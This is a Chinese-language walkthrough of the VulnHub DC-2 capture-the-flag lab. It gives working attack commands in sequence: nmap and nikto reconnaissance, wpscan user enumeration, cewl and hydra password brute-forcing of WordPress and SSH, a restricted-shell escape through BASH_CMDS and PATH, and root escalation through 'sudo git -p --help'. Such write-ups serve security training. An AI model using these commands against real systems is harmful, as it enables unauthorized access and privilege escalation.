综合实战第二章
DC-2
环境准备
靶场下载:https://www.vulnhub.com/?page=2&q=dc
攻击机:kali 192.168.3.134
靶机:DC-2 192.168.3.163
信息搜集
老规矩,上nmap
nmap -p- -A 192.168.3.163
也可以把结果放文件里
nmap -T4 -A 192.168.3.163 -p 1-65535 -oN dc.txt
可以看到网站的话没办法直接访问到dc-2
需要设置域名
vim /etc/hosts
在里面添加一项
192.168.3.163 dc-2
访问网站
flag1出来了
cms是wordpress
用nikto扫一下网站
nikto -h dc-2
看到有个wp-login.php这个网站,访问看看
现在需要用户名和密码
用wpscan
wpscan --url dc-2 -e u
找到三个用户admin
jerry
tom
使用cewl
搜集可能的密码
cewl dc-2 -w pass.txt
再新建一个user文件
vi user
里面放这玩意
接下来破解wp用户名密码
wpscan --url dc-2 -U user -P pass.txt
除了admin,剩下两个账号和密码已经出来了
尝试登录
用jerry账号登录,成功登进去,在里面找到一个flag2
我们尝试用ssh登录
破解ssh
hydra -L user -P pass.txt 192.168.3.163 ssh -s 7744
发现tom可以登录ssh
ssh tom@192.168.3.163 -p 7744
发现cat没法使
提权
echo $PATH
查看一下自己命令行在哪
然后再查看自己能用什么命令
ls usr/bin
可以用vi或者less读取flag3
vi flag3.txt
接下来调用/bin/sh
BASH_CMDS[a]=/bin/sh
按下键盘a就可以调用/bin/sh
结果还是不能用cat,调用/bin/bash
/bin/bash
依然没用
修改环境变量
export PATH=PATH:/bin
export PATH=PATH:/sbin:/bin
再用cat查看flag,成功了
接下来就可以使用su命令了
su jerry
cd ~
ls
cat flag4.txt
接下来要用到git了
git提权
先查看一下权限
sudo -l
发现git有root权限
拿到最终flag
git
可以在help命令之后执行别的命令
sudo git -p --help
或者
sudo git help config
进到这种界面说明可以了
使用!
加命令就可以了
!ls /root
!cat /root/final-flag.txt
结束,完美!